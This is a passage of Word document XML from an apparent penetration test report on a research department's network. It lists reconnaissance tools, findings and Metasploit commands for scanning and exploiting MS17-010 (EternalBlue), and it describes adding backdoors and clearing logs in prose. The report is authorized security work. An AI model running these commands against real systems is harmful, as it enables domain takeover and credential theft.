      <w:r w:rsidR="002C5AA3">
        <w:t xml:space="preserve"> done using the following tools</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D5418" w:rsidRDefault="00426D8B" w:rsidP="00426D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Whois – this is an internet record listing, identifying domain owners and contact details this was used to gather </w:t>
      </w:r>
      <w:r w:rsidR="001D5418">
        <w:t xml:space="preserve">names, email addresses, associated server names, server </w:t>
      </w:r>
      <w:r w:rsidR="001F21FD">
        <w:t>administrator’s</w:t>
      </w:r>
      <w:r w:rsidR="001D5418">
        <w:t xml:space="preserve"> information and registrar details including creation and expi</w:t>
      </w:r>
      <w:r w:rsidR="00874320">
        <w:t xml:space="preserve">ry dates </w:t>
      </w:r>
      <w:r w:rsidR="008356C2">
        <w:t>(ref</w:t>
      </w:r>
      <w:r w:rsidR="00874320">
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="002C5AA3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5AA3" w:rsidRDefault="001D5418" w:rsidP="00E67361">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NsLookup – this </w:t>
      </w:r>
      <w:r w:rsidR="0000511D">
        <w:t>is a tool used for discovering the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP addresses associat</w:t>
      </w:r>
      <w:r w:rsidR="008356C2">
        <w:t>ed with a domain (ref</w:t>
      </w:r>
      <w:r w:rsidR="002C5AA3">
        <w:t>2).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300BFB" w:rsidRDefault="00300BFB" w:rsidP="00E67361">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Netcraft - </w:t>
      </w:r>
      <w:r w:rsidR="00874320">
        <w:t xml:space="preserve"> is a security analysis web platform that contains several tools including anti-fishing and security testing. This was used to collect other relevant information including previous hosting history and </w:t>
      </w:r>
      <w:r w:rsidR="002C5AA3">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="008356C2">
        <w:t>reviously used IP addresses (ref</w:t>
      </w:r>
      <w:r w:rsidR="002C5AA3">
        <w:t>3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5AA3" w:rsidRDefault="002C5AA3" w:rsidP="002C5AA3"/>
    <w:p w:rsidR="002C5AA3" w:rsidRDefault="002C5AA3" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc2777720"/>
      <w:r>
        <w:t xml:space="preserve">1.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="002C5AA3" w:rsidRDefault="002C5AA3" w:rsidP="002C5AA3">
      <w:r>
        <w:t xml:space="preserve">During the exploitation phase there were several </w:t>
      </w:r>
      <w:r w:rsidR="000A0064">
        <w:t>attacks that where prohibited during this penetration test. These include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0064" w:rsidRDefault="000A0064" w:rsidP="000A0064">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0064" w:rsidRDefault="000A0064" w:rsidP="000A0064">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DOS or DDOS attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0064" w:rsidRDefault="000A0064" w:rsidP="000A0064"/>
    <w:p w:rsidR="000A0064" w:rsidRDefault="000A0064" w:rsidP="000A0064">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc2777721"/>
      <w:r>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="000A0064" w:rsidRPr="000A0064" w:rsidRDefault="000A0064" w:rsidP="000A0064">
      <w:r>
        <w:t xml:space="preserve">The scope of this penetration test was limited to </w:t>
      </w:r>
      <w:r w:rsidR="00E572EA">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>Department for Research and Development.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0064" w:rsidRDefault="000A0064" w:rsidP="000A0064"/>
    <w:p w:rsidR="00EB09D4" w:rsidRDefault="002F275B" w:rsidP="00EB09D4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc2777722"/>
      <w:r>
        <w:t>Key Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00EB09D4" w:rsidRDefault="00EB09D4" w:rsidP="00EB09D4">
      <w:r>
        <w:t>The key findings were as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F275B" w:rsidRDefault="00EB09D4" w:rsidP="002F275B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The tester was able to gain administrative control over the domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB09D4" w:rsidRDefault="00EB09D4" w:rsidP="002F275B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>They were able to</w:t>
      </w:r>
      <w:r w:rsidR="00E46162">
        <w:t xml:space="preserve"> create an account and assign it administrative privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162" w:rsidP="002F275B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>They were able to take a hash dump of all usernames and account passwords to be converted back to plain text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E46162" w:rsidRDefault="00E46162" w:rsidP="002F275B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Finally, they were able to transfer files including a payload creating a backdoor to the system for future access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F275B" w:rsidRDefault="002F275B" w:rsidP="002F275B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc2777723"/>
      <w:r>
        <w:t>2. Technical Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="002F275B" w:rsidRPr="002F275B" w:rsidRDefault="002F275B" w:rsidP="002F275B">
      <w:r>
        <w:t>This is the technical details of the actions carried out whilst undertaking the penetration test. Here you will find the tools and methods used to scan and exploit the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6D87" w:rsidRDefault="002F275B" w:rsidP="008356C2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc2777724"/>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00CC6D87" w:rsidRDefault="00CC6D87" w:rsidP="00CC6D87">
      <w:r>
        <w:t>The test was carried out as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6D87" w:rsidRDefault="00EB09D4" w:rsidP="00CC6D87">
      <w:r>
        <w:t>After a connection was established between the server and attacking machine via a ping scan. Several Nmap scan were then carried out to establish what machine was a domain controller, what OS the server was running and a list of available ports and services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB09D4" w:rsidRDefault="00EB09D4" w:rsidP="00CC6D87">
      <w:r>
        <w:t>The metasploit framework was used to carry out a scan using one of its auxiliary modules to determine if certain ports were vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB09D4" w:rsidRDefault="00EB09D4" w:rsidP="00CC6D87">
      <w:r>
        <w:t>The vulnerable Ports were then exploited and a bind tcp connection was established and a meterpreter session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB09D4" w:rsidRPr="00CC6D87" w:rsidRDefault="00EB09D4" w:rsidP="00CC6D87">
      <w:r>
        <w:t>From here the tester escalated privileges, maintained access by creating a persistent backdoor that starts on the machines boot, added new accounts and added them to the administrators group, and then covered their tracks by clearing the events logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008356C2" w:rsidRPr="008356C2" w:rsidRDefault="002F275B" w:rsidP="008356C2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc2777725"/>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Port and service scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="0000511D" w:rsidRDefault="0000511D" w:rsidP="0000511D">
      <w:r>
        <w:t>This portion of the test is critical as this is where the open ports and running services are discovered and these will be the areas where a malicious hacker</w:t>
      </w:r>
      <w:r w:rsidR="00171D2F">
        <w:t xml:space="preserve"> would try and exploit using known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00171D2F" w:rsidRDefault="00171D2F" w:rsidP="0000511D">
      <w:r>
        <w:t>Running services and open ports can be easily listed using a variety of tools. One of the most common tools used and the one primarily used in this test was Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00171D2F" w:rsidRDefault="00171D2F" w:rsidP="00171D2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nmap – a command line tool used for discovering hosts and services on a network, it does this by sending packets and analyzing the responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008356C2" w:rsidRDefault="008356C2" w:rsidP="008356C2"/>
    <w:p w:rsidR="008356C2" w:rsidRDefault="008356C2" w:rsidP="008356C2"/>
    <w:p w:rsidR="008356C2" w:rsidRDefault="008356C2" w:rsidP="008356C2"/>
    <w:p w:rsidR="008356C2" w:rsidRPr="0000511D" w:rsidRDefault="00646A38" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc2777726"/>
      <w:r>
        <w:t>2.2.1</w:t>
      </w:r>
      <w:r w:rsidR="008356C2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008356C2">
        <w:t>Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="002F275B" w:rsidRDefault="0000511D" w:rsidP="002F275B">
      <w:r>
        <w:t>The network was initially scanned using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0000511D" w:rsidRDefault="0000511D" w:rsidP="002F275B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000511D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nmap –sV 10.10.10.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008356C2">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00171D2F" w:rsidRDefault="00171D2F" w:rsidP="002F275B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">This listed host machines that where live on the network and also the services and the ports each service was running on. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00171D2F" w:rsidRDefault="00171D2F" w:rsidP="002F275B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>IP 10.10.10.1 showe</w:t>
      </w:r>
      <w:r w:rsidR="005D6F8F">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>d services for active directory, indicating that this particular host was a domain controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6F8F" w:rsidRDefault="005D6F8F" w:rsidP="002F275B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Another nmap scan was used to identify the operating system and other relevant information, using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6F8F" w:rsidRDefault="005D6F8F" w:rsidP="002F275B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6F8F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Nmap –Pn –O 10.10.10.1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6F8F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008356C2">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(ref</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6F8F" w:rsidRDefault="000F36DB" w:rsidP="002F275B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>This highlighted the domain controller is running on a Windows Server 2012 Operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0000511D" w:rsidRDefault="00646A38" w:rsidP="002F275B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>These scans also discovered the following services running on the ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00646A38" w:rsidRDefault="00646A38" w:rsidP="00646A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>139 – net bios, this service …</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00646A38" w:rsidRDefault="00646A38" w:rsidP="00646A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>445 – Microsoft ds, this service …</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E572EA" w:rsidRPr="00E572EA" w:rsidRDefault="00E572EA" w:rsidP="00E572EA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Further scans where carried to assess program privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00646A38" w:rsidRDefault="00646A38" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00646A38" w:rsidRDefault="00646A38" w:rsidP="00E46162">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc2777727"/>
      <w:r>
        <w:t xml:space="preserve">2.2.2 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Identify</w:t>
      </w:r>
      <w:r w:rsidR="00A817CC">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00646A38" w:rsidRDefault="00A817CC" w:rsidP="00646A38">
      <w:r>
        <w:t>This phase is also critical to the test as this is how a hacker would determine what ports/services are vulnerable to known exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00076A3C" w:rsidRDefault="00A817CC" w:rsidP="00646A38">
      <w:r>
        <w:t>Using information gathered in the previous scan another scan took place to identify if port 445 was susceptible and vulnerable to the MS17_010 Eternal Blue SMB attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A817CC" w:rsidRDefault="00D801C2" w:rsidP="00646A38">
      <w:r>
        <w:t>However,</w:t>
      </w:r>
      <w:r w:rsidR="00A817CC">
        <w:t xml:space="preserve"> this scan was conducted from inside the metasploit framework using</w:t>
      </w:r>
      <w:r w:rsidR="00076A3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00076A3C">
        <w:t xml:space="preserve"> auxiliary modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00076A3C" w:rsidRDefault="00076A3C" w:rsidP="00076A3C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The metasploit framework was opened with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00076A3C" w:rsidRDefault="00076A3C" w:rsidP="00076A3C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00076A3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (re6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>?)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00076A3C" w:rsidRDefault="00CB1561" w:rsidP="00076A3C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>From here a suitable auxiliary module was selected with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRPr="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00076A3C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB1561">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>(ref7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1561">
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00646A38" w:rsidRDefault="00CB1561" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>Another command was ran to list the available options associated with the module such as the receiving host:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB1561">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ref8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>The victim IP was set with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB1561">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>set RHOSTS 10.10.10.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1561">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>(ref9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>And finally the scan was ran by using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB1561">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ref10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t xml:space="preserve">The scan was complete and indicated that the victim machine was in fact vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="00D801C2">
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>an smb</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack on port 445 (ref11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00646A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00CB1561">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc2777728"/>
      <w:r>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r w:rsidR="00384C51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00CB1561" w:rsidRDefault="00CB1561" w:rsidP="00CB1561">
      <w:r>
        <w:t>The metasploit framework also contains attack modules which allowed the attacki</w:t>
      </w:r>
      <w:r w:rsidR="00A865B8">
        <w:t>ng system to apply the exploit to a victim machine on the network.</w:t>
      </w:r>
      <w:r w:rsidR="00473656">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00473656" w:rsidRDefault="00473656" w:rsidP="00CB1561">
      <w:r>
        <w:t>The ms17_010_psexec exploit was chosen as previous scans indicated it was vulnerable to it. The exploit was selected with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00473656" w:rsidRDefault="00473656" w:rsidP="00CB1561">
      <w:r w:rsidRPr="001F21FD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms17_010_psexec</w:t>
      </w:r>
      <w:r w:rsidR="00E67361">
        <w:t xml:space="preserve"> (ref12</w:t>
